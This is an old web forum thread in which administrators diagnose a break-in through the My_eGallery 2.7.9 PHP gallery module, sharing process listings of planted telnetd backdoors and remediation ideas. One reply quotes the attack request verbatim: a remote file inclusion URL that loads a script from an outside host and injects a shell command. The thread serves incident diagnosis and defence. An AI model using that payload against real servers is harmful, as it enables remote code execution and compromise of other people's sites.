 |
|
 |
|
- Readme First! -
Read and follow the rules, otherwise your posts will be closed |
|
|
|
|
|
There are currently, 539 guest(s) and 0 member(s) that are online.
You are Anonymous user. You can register for free by clicking here |
|
|
|
|
|
Security Bug in My_eGallery 2.7.9 |
|
 Laffer writes "I discovered that there seems to be a big security bug in My_eGallery and every day someone is exploiting and reinstalling some processes on my webserver. Very dangerous, because the Hacker uploads a file on the server and does put it in the /tmp directory and then can execute it (I do not know HOW by now!!!). But the LOGS show that the file is uploaded by My_eGallery...
If somebody has an idea????
Everybody should check his /tmp Directory for files with suspicous names like telnetd or bind.txt or files which have readable names. Look into those files if their are not Hacks...
I discovered on my server following processes:
6926 ? S 0:00 getty
6932 ? T 0:00 ./telnetd
6933 ? S 0:00 getty
6936 ? Z 0:00 [telnetd ]
6939 ? T 0:00 ./telnetd
6940 ? S 0:00 getty
6942 ? Z 0:00 [telnetd ]
6947 ? S 0:00 getty
7005 ? T 0:00 ./telnetd
7006 ? S 0:00 getty
7009 ? Z 0:00 [telnetd ]
7012 ? T 0:00 ./telnetd
7013 ? S 0:00 getty
7016 ? Z 0:00 [telnetd ]
Then:
-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----
?????:/tmp # stat telnetd
File: `telnetd'
Size: 170613 Blocks: 336 IO Block: 4096 Regular File
Device: 302h/770d Inode: 260574 Links: 1
Access: (7777/-rwsrwsrwt) Uid: ( 30/ wwwrun) Gid: (65534/ nogroup)
Access: 2003-11-18 22:52:41.000000000 +0100
Modify: 2003-02-07 18:35:31.000000000 +0100
Change: 2003-11-18 22:21:35.000000000 +0100
-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----
Looking further:
002 30 6926 1 17 0 2012 488 schedu S ? 0:00 getty
SHELL=/bin/sh MAILTO=root
OLDPWD=/???/www/?????/www.????????.de/modules/My_eGallery/public
LD_LIBRARY_PATH=:/lib COLUMNS=80
PATH=/usr/bin:/usr/sbin:/sbin:/bin:/usr/lib/news/bin RUNLEVEL=3 PWD=/tmp
DAEMON=/usr/sbin/httpd PREVLEVEL=N LINES=24 DBROOT=/dev/null HOME=/root
SHLVL=4 LOGNAME=root ORACLE_HOME= _=./telnetd
002 30 6932 1 17 0 2008 452 do_sig T ? 0:00
./telnetd SHELL=/bin/sh MAILTO=root
OLDPWD=/???/www/??????/www.???????.de/modules/My_eGallery/public
LD_LIBRARY_PATH=:/lib COLUMNS=80
PATH=/usr/bin:/usr/sbin:/sbin:/bin:/usr/lib/news/bin RUNLEVEL=3 PWD=/tmp
DAEMON=/usr/sbin/httpd PREVLEVEL=N LINES=24 DBROOT=/dev/null HOME=/root
SHLVL=4 LOGNAME=root ORACLE_HOME= _=./telnetd
"
|
|
Posted on Wednesday, November 19 @ 09:47:39 CET by Zhen-Xjell |
|
|
|
|
| |
|
Average Score: 4.5
Votes: 2
|
|
|
|
|
|
|
| | The comments are owned by the poster. We aren't responsible for their content. |
| | | | |
| No Comments Allowed for Anonymous, please register | | | | |
Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Johan1982 on Wednesday, November 19 @ 10:26:28 CET
(User Info | Send a Message) | | Somebody knows some solution on this? |
| | | | |
Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by judas (judas_iscariote@piscola.com) on Wednesday, November 19 @ 10:40:13 CET
(User Info | Send a Message) | hi:
in the past,i was help a friend,his site files was disapear,and the only suspiciuos thing was the My_egallery module,I was ckeck the code,but I can t find the posibble bug,maybe chatserv(if he is online again) can tell us something about it..
I believe my_egallery allows code execution on some buggy function...
bye |
| | | | |
Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Jeruvy on Wednesday, November 19 @ 18:24:03 CET
(User Info | Send a Message) | For now at least I'd disable uploading. I never used eGallery as I didn't think it did enough sanitization compared to Coppermine. My only (crappy) suggestion would be to remove eGallery, and use Coppermine.
Not the best answer, but I'm also not interested in learning another module, I've already decided isn't in my best interests to use... =(
J.
|
| | | | |
Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by luisba on Friday, November 21 @ 05:18:38 CET
(User Info | Send a Message) | I have the same problem. I discovered that the line used is
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;ls
or similar
and you can use it although you have disable the module.
It's a bug very dangerous but i don't know how stop it. I deleted the module My_eGallery.
I hope that above line can help.
|
| | | | |
Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Jeruvy on Thursday, November 27 @ 20:40:26 CET
(User Info | Send a Message) | NOTE: Bugtraq has released a vulnerability for eGallery. I have posted it for news, but it hasn't been made available as of yet.
In any case send me a msg if you want the link or go get it yourself on the bugtraq archives.
|
| | | | |
Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Laffer on Friday, November 28 @ 10:10:28 CET
(User Info | Send a Message) http://www.comicfan.de | | I found the exec($cmd) lines in the imageFunctions.php but even when I outcommented those lines, the exploit works... Crazy... |
| | | | | |
|
